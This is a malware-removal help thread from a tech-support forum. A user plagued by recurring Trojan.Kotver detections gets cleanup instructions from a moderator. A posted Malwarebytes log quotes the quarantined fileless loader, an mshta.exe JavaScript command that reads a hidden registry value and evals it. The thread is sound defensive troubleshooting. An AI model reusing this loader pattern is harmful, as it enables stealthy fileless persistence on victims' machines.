Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Freq occuring Trojan.Kotver!gm2


  • Please log in to reply
5 replies to this topic

#1 cjpat

cjpat

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:03:46 PM

Posted 06 October 2016 - 05:58 AM

I am hoping for a recommendation and advisement on how to permanently remove Trojan.Kotver!gm2 from my OS.

 

I am operating Windows 10 w/the anniversary update on a 2 month old PC and use Norton Security (frequently updated with current definitions) for my antivirus protection.  in the last couple of days, I have been plagued by Trojan.Kotver!gm2 which is frequently re-occurring.  Norton Warning pops up almost every 10 mins to tell me that it detected and fixed the Trojan.Kotver!gm2 and that I need to restart my computer to finalize the repair.  After restarting, within 10 minutes I get the same message reported by Norton, also requiring restart.  I have restarted using restart as well as a complete full shutdown and new boot up.  Same problem persists.

 

I have initiated scans with quick scan and also full scan which always finds the Trojan against and says it removed it and I need to restart, but the problem persists.  I have used Norton's Power eraser several times and the problem still persists.  I went onto the Norton forum and it recommended BleepingComputer (and a few alternative sites, but nothing that Norton itself can resolve.

 

I would greatly appreciate any assistance to remove this plague.  I am disappointed that Norton is ineffectual.


Edited by NickAu, 06 October 2016 - 06:03 AM.
Moved from Windows 10


BC AdBot (Login to Remove)

 


#2 buddy215

buddy215

  • Moderator
  • 13,301 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:02:46 PM

Posted 06 October 2016 - 06:16 AM

Welcome to BC....

 

Does Norton give you the file name/ location of what it is finding and supposedly removing?

 

Use the programs below to clean, remove adware and remove malware.

 

Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the

Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.

After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.

CCleaner - PC Optimization and Cleaning - Free Download

 

Download Malwarebytes' Anti-Malware from Here

Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).

  • Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
  • Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
  • Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
  • Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.
  • If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).
  • When MBAM is finished scanning it will display a screen that displays any malware that it has detected.
  • Click the Remove Selected button.
  • MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so.
  • While still on the Scan tab, click the link for View detailed log, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
  • The log is automatically saved by MBAM and can also be viewed by clicking the History tab and then selecting Application Logs.

POST THE LOG FOR  REVIEW.

 

Download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Scan button.
  • When the scan has finished click on Clean button.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the contents of that logfile with your next reply.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
  • download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#3 cjpat

cjpat
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:03:46 PM

Posted 07 October 2016 - 05:24 AM

Buddy125,

According to Norton's History, The trojan.Kotver!gm2 has been originating in my C:\windows\syswow64 folder.  I have pasted the Norton History below. I will follow your guidance and post my results.

 

Norton History for CJPat

Filename: 00010628.tmp
Threat name: Trojan.Kotver!gm2Full Path: c:\windows\syswow64\00010628.tmp
____________________________
____________________________

On computers as of 
10/6/2016 at 8:26:18 AM
Last Used 
10/6/2016 at 8:28:53 AM
Startup Item 
No
Launched 
No
Threat type: Virus. Programs that infect other programs, files, or areas of a computer by inserting themselves or attaching themselves to that medium.

____________________________

00010628.tmp Threat name: Trojan.Kotver!gm2
Locate

Very Few Users
Fewer than 5 users in the Norton Community have used this file.
Very New
This file was released less than 1 week  ago.
High
This file risk is high.

____________________________

Source: External Media
Source File:
00010628.tmp
____________________________
File Actions
Infected file: c:\windows\syswow64\ 00010628.tmp Removed
Infected file: c:\windows\syswow64\ 00023738.tmp Removed
Infected file: c:\windows\syswow64\ 00015332.tmp Removed
Infected file: c:\windows\syswow64\ 00008883.tmp Removed
Infected file: c:\windows\syswow64\ 00021842.tmp Removed
Infected file: c:\windows\syswow64\ 00027779.tmp Removed
Infected file: c:\windows\syswow64\ 00011572.tmp Removed
Infected file: c:\windows\syswow64\ 00024065.tmp Removed
Infected file: c:\windows\syswow64\ 00008686.tmp Removed
Infected file: c:\windows\syswow64\ 00001628.tmp Removed
Infected file: c:\windows\syswow64\ 00028381.tmp Removed
Infected file: c:\windows\syswow64\ 00016553.tmp Removed
Infected file: c:\windows\syswow64\ 00000844.tmp Removed
Infected file: c:\windows\syswow64\ 00017790.tmp Removed
Infected file: c:\windows\syswow64\ 00002565.tmp Removed
Infected file: c:\windows\syswow64\ 00024264.tmp Removed
Infected file: c:\windows\syswow64\ 00028263.tmp Removed
Infected file: c:\windows\syswow64\ 00030469.tmp Removed
Infected file: c:\windows\syswow64\ 00021287.tmp Removed
Infected file: c:\windows\syswow64\ 00018304.tmp Removed
Infected file: c:\windows\syswow64\ 00020521.tmp Removed
Infected file: c:\windows\syswow64\ 00017734.tmp Removed
Infected file: c:\windows\syswow64\ 00014356.tmp Removed
Infected file: c:\windows\syswow64\ 00010989.tmp Removed
Infected file: c:\windows\syswow64\ 00027531.tmp Removed
Infected file: c:\windows\syswow64\ 00011618.tmp Removed
Infected file: c:\windows\syswow64\ 00012087.tmp Removed
Infected file: c:\windows\syswow64\ 00007258.tmp Removed
Infected file: c:\windows\syswow64\ 00025341.tmp Removed
Infected file: c:\windows\syswow64\ 00029468.tmp Removed
Infected file: c:\windows\syswow64\ 00011292.tmp Removed
Infected file: c:\windows\syswow64\ 00017589.tmp Removed
Infected file: c:\windows\syswow64\ 00028936.tmp Removed
Infected file: c:\windows\syswow64\ 00001767.tmp Removed
Infected file: c:\windows\syswow64\ 00015668.tmp Removed
Infected file: c:\windows\syswow64\ 00006465.tmp Removed
Infected file: c:\windows\syswow64\ 00005170.tmp Removed
Infected file: c:\windows\syswow64\ 00004675.tmp Removed
Infected file: c:\windows\syswow64\ 00014034.tmp Removed
Infected file: c:\windows\syswow64\ 00027275.tmp Removed
Infected file: c:\windows\syswow64\ 00012834.tmp Removed
Infected file: c:\windows\syswow64\ 00007754.tmp Removed
Infected file: c:\windows\syswow64\ 00003962.tmp Removed
Infected file: c:\windows\syswow64\ 00024479.tmp Removed
Infected file: c:\windows\syswow64\ 00030212.tmp Removed
Infected file: c:\windows\syswow64\ 00002182.tmp Removed
Infected file: c:\windows\syswow64\ 00020827.tmp Removed
Infected file: c:\windows\syswow64\ 00012667.tmp Removed
Infected file: c:\windows\syswow64\ 00028207.tmp Removed
Infected file: c:\windows\syswow64\ 00014854.tmp Removed
Infected file: c:\windows\syswow64\ 00017690.tmp Removed
Infected file: c:\windows\syswow64\ 00015044.tmp Removed
Infected file: c:\windows\syswow64\ 00011525.tmp Removed
Infected file: c:\windows\syswow64\ 00021681.tmp Removed
Infected file: c:\windows\syswow64\ 00014801.tmp Removed
Infected file: c:\windows\syswow64\ 00012216.tmp Removed
Infected file: c:\windows\syswow64\ 00028955.tmp Removed
Infected file: c:\windows\syswow64\ 00019162.tmp Removed
Infected file: c:\windows\syswow64\ 00003672.tmp Removed
Infected file: c:\windows\syswow64\ 00004708.tmp Removed
Infected file: c:\windows\syswow64\ 00006299.tmp Removed
Infected file: c:\windows\syswow64\ 00005396.tmp Removed
Infected file: c:\windows\syswow64\ 00024515.tmp Removed
Infected file: c:\windows\syswow64\ 00014103.tmp Removed
Infected file: c:\windows\syswow64\ 00025574.tmp Removed
Infected file: c:\windows\syswow64\ 00031303.tmp Removed
Infected file: c:\windows\syswow64\ 00000299.tmp Removed
Infected file: c:\windows\syswow64\ 00027926.tmp Removed
Infected file: c:\windows\syswow64\ 00019325.tmp Removed
Infected file: c:\windows\syswow64\ 00007683.tmp Removed
Infected file: c:\windows\syswow64\ 00008370.tmp Removed
Infected file: c:\windows\syswow64\ 00008081.tmp Removed
Infected file: c:\windows\syswow64\ 00027937.tmp Removed
Infected file: c:\windows\syswow64\ 00018709.tmp Removed
Infected file: c:\windows\syswow64\ 00015809.tmp Removed
____________________________

File Thumbprint - SHA:
8ccd21e59e782c7a507789eb6eb3f332bbfe206ffc47b36d43dd7971ee3011f4
File Thumbprint - MD5:
Not available


#4 buddy215

buddy215

  • Moderator
  • 13,301 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:02:46 PM

Posted 07 October 2016 - 06:37 AM

Trojan.Kotver is a Trojan horse that performs click-fraud operations on the compromised computer. Since Norton is saying it is a heuristic finding,

you can submit one of the files it says may be Kotver to VirusTotal - Free Online Virus and Malware Scan  to be scanned by numerous security programs

if the other scans don't cure the problem. Post the results of that scan or a link to the results along with the other scan results.


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#5 cjpat

cjpat
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:03:46 PM

Posted 08 October 2016 - 06:46 AM

Buddy125,

Thank you for your assistance.  I believe we have been successful in removing the actual Trojan.

 

I first did CC Cleaner and followed it up with Malwarebytes which I believe resolved my issue by removing the generator.  I ran Adware Cleaner and it only found and removed my Weatherbug program (no big problem).  Because I was not receiving anymore Norton notices, I did not continue with downloading and running the remainder of the programs.

 

Thank You very much,

C. Paterson

 

For reference, here is the Malwarbyte's log:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/7/2016
Scan Time: 6:47 AM
Logfile: Trojan.Kotver!gm2.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.10.07.03
Rootkit Database: v2016.09.26.02
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Dad_Game

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 301950
Time Elapsed: 3 min, 35 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-437256314-2701980669-3462531727-1001_Classes\7E1E8F3\SHELL\OPEN\COMMAND, Quarantined, [124d95017129ef47fec18d708d769967],

Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-437256314-2701980669-3462531727-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^vocbalrivo, Quarantined, [adb28f077624c96d9b277689fe058b75],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-437256314-2701980669-3462531727-1001_Classes\7e1e8f3\SHELL\OPEN\COMMAND, "C:\WINDOWS\system32\mshta.exe" "javascript:e6hUiU="FKxZO6";f8d0=new ActiveXObject("WScript.Shell");qdDsv3="3";pHEB7=f8d0.RegRead("HKCU\\software\\vvsrkhqtvv\\pkfb");Jsk7w="vV4T";eval(pHEB7);g6grsw="nLExg";", Quarantined, [124d95017129ef47fec18d708d769967]

Registry Data: 0
(No malicious items detected)

Folders: 0



#6 buddy215

buddy215

  • Moderator
  • 13,301 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:02:46 PM

Posted 08 October 2016 - 07:36 AM

Weather Bug is a known adware. You can easily use a website such as www.wunderground.com....my favorite.

 

I suggest you scan with all of the programs. I also note that you need to rescan with MBAM using the settings per instructions.

Be sure to enable rootkit scanning.

  • Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
  • Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
  • Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled  (change to Enabled)
Heuristics: Enabled
PUP: Enabled
PUM: Enabled


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users